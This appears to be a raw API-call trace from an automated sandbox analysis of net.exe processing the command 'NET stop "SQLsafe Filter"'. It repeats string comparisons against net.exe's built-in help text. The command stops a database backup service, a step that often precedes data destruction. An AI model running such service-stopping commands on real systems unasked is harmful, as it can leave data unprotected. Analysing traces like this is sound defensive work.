LocalFree (hMem=0x355638) returned 0x0 [0218.697] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x12 [0218.697] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter", _String2="NET START SERVER\r\n", _MaxCount=0x1a) returned 14 [0218.697] LocalFree (hMem=0x355638) returned 0x0 [0218.697] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0xf [0218.697] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter", _String2="NET START UPS\r\n", _MaxCount=0x1a) returned 14 [0218.698] LocalFree (hMem=0x355638) returned 0x0 [0218.698] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x17 [0218.698] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter", _String2="NET START WORKSTATION\r\n", _MaxCount=0x1a) returned 14 [0218.698] LocalFree (hMem=0x355638) returned 0x0 [0218.698] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x18 [0218.698] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x1a) returned 14 [0218.698] LocalFree (hMem=0x355638) returned 0x0 [0218.698] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x2a [0218.698] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter", _String2="NET STATISTICS\r\n[WORKSTATI", _MaxCount=0x1a) returned 14 [0218.698] LocalFree (hMem=0x355638) returned 0x0 [0218.698] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x15 [0218.698] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x1a) returned 19 [0218.698] LocalFree (hMem=0x355638) returned 0x0 [0218.698] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x58 [0218.698] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter", _String2="NET TIME\r\n\r\n[\\\\computernam", _MaxCount=0x1a) returned -1 [0218.698] LocalFree (hMem=0x355638) returned 0x0 [0218.698] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x184 [0218.698] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter", _String2="NET USE\r\n[devicename | *] ", _MaxCount=0x1a) returned -2 [0218.698] LocalFree (hMem=0x355638) returned 0x0 [0218.698] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0xc7 [0218.698] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter", _String2="NET USER\r\n[username [passw", _MaxCount=0x1a) returned -2 [0218.698] LocalFree (hMem=0x355638) returned 0x0 [0218.698] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x47 [0218.698] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter", _String2="NET VIEW\r\n[\\\\computername ", _MaxCount=0x1a) returned -3 [0218.698] LocalFree (hMem=0x355638) returned 0x0 [0218.698] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0xc2 [0218.698] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter", _String2="NET\r\n [ ACCOUNTS | COMP", _MaxCount=0x1a) returned 19 [0218.698] LocalFree (hMem=0x355638) returned 0x0 [0218.698] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x319 [0218.698] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter", _String2="SERVICES\r\nNET START can be", _MaxCount=0x1a) returned -5 [0218.698] LocalFree (hMem=0x355638) returned 0x0 [0218.698] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x483 [0218.698] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter", _String2="SYNTAX\r\nThe following conv", _MaxCount=0x1a) returned -5 [0218.698] LocalFree (hMem=0x355638) returned 0x0 [0218.698] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0xa86 [0218.698] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter", _String2="NAMES\r\nThe following types", _MaxCount=0x1a) returned 4 [0218.698] LocalFree (hMem=0x355638) returned 0x0 [0218.699] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x54 [0218.699] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Filter", _String2="\r\nFor more information on ", _MaxCount=0x1a) returned 97 [0218.699] LocalFree (hMem=0x355638) returned 0x0 [0218.699] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0xad [0218.699] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET ACCOUNTS\r\n[/FOR", _MaxCount=0x13) returned 18 [0218.699] LocalFree (hMem=0x355638) returned 0x0 [0218.699] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x2e [0218.699] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET COMPUTER\r\n\\\\com", _MaxCount=0x13) returned 16 [0218.699] LocalFree (hMem=0x355638) returned 0x0 [0218.699] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x7d [0218.699] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET CONFIG SERVER\r\n", _MaxCount=0x13) returned 16 [0218.699] LocalFree (hMem=0x355638) returned 0x0 [0218.699] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x26 [0218.699] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET CONFIG\r\n[SERVER", _MaxCount=0x13) returned 16 [0218.699] LocalFree (hMem=0x355638) returned 0x0 [0218.699] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x19 [0218.699] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET CONTINUE\r\nservi", _MaxCount=0x13) returned 16 [0218.699] LocalFree (hMem=0x355638) returned 0x0 [0218.699] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x1b [0218.699] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET FILE\r\n[id [/CLO", _MaxCount=0x13) returned 13 [0218.699] LocalFree (hMem=0x355638) returned 0x0 [0218.699] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0xbe [0218.699] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET GROUP\r\n[groupna", _MaxCount=0x13) returned 12 [0218.699] LocalFree (hMem=0x355638) returned 0x0 [0218.699] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x33 [0218.699] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET HELP\r\ncommand\r\n", _MaxCount=0x13) returned 11 [0218.699] LocalFree (hMem=0x355638) returned 0x0 [0218.699] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x19 [0218.699] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET HELPMSG\r\nmessag", _MaxCount=0x13) returned 11 [0218.700] LocalFree (hMem=0x355638) returned 0x0 [0218.700] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0xc1 [0218.700] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET LOCALGROUP\r\n[gr", _MaxCount=0x13) returned 7 [0218.700] LocalFree (hMem=0x355638) returned 0x0 [0218.700] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x16 [0218.700] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET PAUSE\r\nservice\r", _MaxCount=0x13) returned 3 [0218.700] LocalFree (hMem=0x355638) returned 0x0 [0218.700] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x33 [0218.700] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET SESSION\r\n[\\\\com", _MaxCount=0x13) returned 15 [0218.700] LocalFree (hMem=0x355638) returned 0x0 [0218.700] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x234 [0218.700] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET SHARE\r\nsharenam", _MaxCount=0x13) returned 12 [0218.700] LocalFree (hMem=0x355638) returned 0x0 [0218.700] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x13 [0218.700] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET START BROWSER\r\n", _MaxCount=0x13) returned 14 [0218.700] LocalFree (hMem=0x355638) returned 0x0 [0218.700] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x14 [0218.700] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET START CLIPBOOK\r", _MaxCount=0x13) returned 14 [0218.700] LocalFree (hMem=0x355638) returned 0x0 [0218.700] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x14 [0218.700] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET START EVENTLOG\r", _MaxCount=0x13) returned 14 [0218.700] LocalFree (hMem=0x355638) returned 0x0 [0218.700] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="嘸5⡋瓢\x1d嘸5\x1d") returned 0x15 [0218.700] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET START MESSENGER", _MaxCount=0x13) returned 14 [0218.700] LocalFree (hMem=0x355638) returned 0x0 [0218.700] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="瘸5⡋瓢\x1d嘸5\x1d") returned 0x15 [0218.700] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET START NET LOGON", _MaxCount=0x13) returned 14 [0218.700] LocalFree (hMem=0x357638) returned 0x0 [0218.700] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="阸5⡋瓢\x1d瘸5\x1d") returned 0x16 [0218.700] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET START RPCLOCATO", _MaxCount=0x13) returned 14 [0218.700] LocalFree (hMem=0x359638) returned 0x0 [0218.700] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="阸5⡋瓢\x1d阸5\x1d") returned 0x11 [0218.700] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET START RPCSS\r\n", _MaxCount=0x13) returned 14 [0218.701] LocalFree (hMem=0x359638) returned 0x0 [0218.701] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="阸5⡋瓢\x1d阸5\x1d") returned 0x14 [0218.701] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET START SCHEDULE\r", _MaxCount=0x13) returned 14 [0218.701] LocalFree (hMem=0x359638) returned 0x0 [0218.701] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="阸5⡋瓢\x1d阸5\x1d") returned 0x12 [0218.701] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET START SERVER\r\n", _MaxCount=0x13) returned 14 [0218.701] LocalFree (hMem=0x359638) returned 0x0 [0218.701] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="阸5⡋瓢\x1d阸5\x1d") returned 0xf [0218.701] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET START UPS\r\n", _MaxCount=0x13) returned 14 [0218.701] LocalFree (hMem=0x359638) returned 0x0 [0218.701] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="阸5⡋瓢\x1d阸5\x1d") returned 0x17 [0218.701] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET START WORKSTATI", _MaxCount=0x13) returned 14 [0218.701] LocalFree (hMem=0x359638) returned 0x0 [0218.701] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="阸5⡋瓢\x1d阸5\x1d") returned 0x18 [0218.701] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET START\r\n[service", _MaxCount=0x13) returned 14 [0218.701] LocalFree (hMem=0x359638) returned 0x0 [0218.701] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="阸5⡋瓢\x1d阸5\x1d") returned 0x2a [0218.701] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET STATISTICS\r\n[WO", _MaxCount=0x13) returned 14 [0218.701] LocalFree (hMem=0x359638) returned 0x0 [0218.701] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="阸5⡋瓢\x1d阸5\x1d") returned 0x15 [0218.701] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET STOP\r\nservice\r\n", _MaxCount=0x13) returned 19 [0218.701] LocalFree (hMem=0x359638) returned 0x0 [0218.701] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="阸5⡋瓢\x1d阸5\x1d") returned 0x58 [0218.701] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET TIME\r\n\r\n[\\\\comp", _MaxCount=0x13) returned -1 [0218.701] LocalFree (hMem=0x359638) returned 0x0 [0218.701] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="阸5⡋瓢\x1d阸5\x1d") returned 0x184 [0218.701] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET USE\r\n[devicenam", _MaxCount=0x13) returned -2 [0218.701] LocalFree (hMem=0x359638) returned 0x0 [0218.701] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="阸5⡋瓢\x1d阸5\x1d") returned 0xc7 [0218.701] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET USER\r\n[username", _MaxCount=0x13) returned -2 [0218.701] LocalFree (hMem=0x359638) returned 0x0 [0218.701] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="阸5⡋瓢\x1d阸5\x1d") returned 0x47 [0218.701] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET VIEW\r\n[\\\\comput", _MaxCount=0x13) returned -3 [0218.701] LocalFree (hMem=0x359638) returned 0x0 [0218.701] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="阸5⡋瓢\x1d阸5\x1d") returned 0xc2 [0218.701] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET\r\n [ ACCOUNTS", _MaxCount=0x13) returned 19 [0218.701] LocalFree (hMem=0x359638) returned 0x0 [0218.701] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="阸5⡋瓢\x1d阸5\x1d") returned 0x319 [0218.702] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="SERVICES\r\nNET START", _MaxCount=0x13) returned -5 [0218.702] LocalFree (hMem=0x359638) returned 0x0 [0218.702] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="阸5⡋瓢\x1d阸5\x1d") returned 0x483 [0218.702] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="SYNTAX\r\nThe followi", _MaxCount=0x13) returned -5 [0218.702] LocalFree (hMem=0x359638) returned 0x0 [0218.702] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="阸5⡋瓢\x1d阸5\x1d") returned 0xa86 [0218.702] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NAMES\r\nThe followin", _MaxCount=0x13) returned 4 [0218.702] LocalFree (hMem=0x359638) returned 0x0 [0218.702] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="阸5⡋瓢\x1d阸5\x1d") returned 0x54 [0218.702] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="\r\nFor more informat", _MaxCount=0x13) returned 97 [0218.702] LocalFree (hMem=0x359638) returned 0x0 [0218.702] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="阸5⡋瓢\x1d阸5\x1d") returned 0xad [0218.702] _wcsnicmp (_String1="NET stop", _String2="NET ACCO", _MaxCount=0x8) returned 18 [0218.702] LocalFree (hMem=0x359638) returned 0x0 [0218.702] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="阸5⡋瓢\x1d阸5\x1d") returned 0x2e [0218.702] _wcsnicmp (_String1="NET stop", _String2="NET COMP", _MaxCount=0x8) returned 16 [0218.702] LocalFree (hMem=0x359638) returned 0x0 [0218.702] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="阸5⡋瓢\x1d阸5\x1d") returned 0x7d [0218.702] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0218.702] LocalFree (hMem=0x359638) returned 0x0 [0218.702] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="阸5⡋瓢\x1d阸5\x1d") returned 0x26 [0218.702] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0218.702] LocalFree (hMem=0x359638) returned 0x0 [0218.702] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="阸5⡋瓢\x1d阸5\x1d") returned 0x19 [0218.702] _wcsnicmp (_String1="NET stop", _String2="NET CONT", _MaxCount=0x8) returned 16 [0218.702] LocalFree (hMem=0x359638) returned 0x0 [0218.703] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="阸5⡋瓢\x1d阸5\x1d") returned 0x1b [0218.703] _wcsnicmp (_String1="NET stop", _String2="NET FILE", _MaxCount=0x8) returned 13 [0218.703] LocalFree (hMem=0x359638) returned 0x0 [0218.703] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="阸5⡋瓢\x1d阸5\x1d") returned 0xbe [0218.703] _wcsnicmp (_String1="NET stop", _String2="NET GROU", _MaxCount=0x8) returned 12 [0218.703] LocalFree (hMem=0x359638) returned 0x0 [0218.703] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="阸5⡋瓢\x1d阸5\x1d") returned 0x33 [0218.703] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0218.703] LocalFree (hMem=0x359638) returned 0x0 [0218.703] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="阸5⡋瓢\x1d阸5\x1d") returned 0x19 [0218.703] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0218.703] LocalFree (hMem=0x359638) returned 0x0 [0218.703] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="阸5⡋瓢\x1d阸5\x1d") returned 0xc1 [0218.703] _wcsnicmp (_String1="NET stop", _String2="NET LOCA", _MaxCount=0x8) returned 7 [0218.703] LocalFree (hMem=0x359638) returned 0x0 [0218.703] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="阸5⡋瓢\x1d阸5\x1d") returned 0x16 [0218.703] _wcsnicmp (_String1="NET stop", _String2="NET PAUS", _MaxCount=0x8) returned 3 [0218.703] LocalFree (hMem=0x359638) returned 0x0 [0218.703] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="阸5⡋瓢\x1d阸5\x1d") returned 0x33 [0218.703] _wcsnicmp (_String1="NET stop", _String2="NET SESS", _MaxCount=0x8) returned 15 [0218.703] LocalFree (hMem=0x359638) returned 0x0 [0218.703] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="阸5⡋瓢\x1d阸5\x1d") returned 0x234 [0218.703] _wcsnicmp (_String1="NET stop", _String2="NET SHAR", _MaxCount=0x8) returned 12 [0218.703] LocalFree (hMem=0x359638) returned 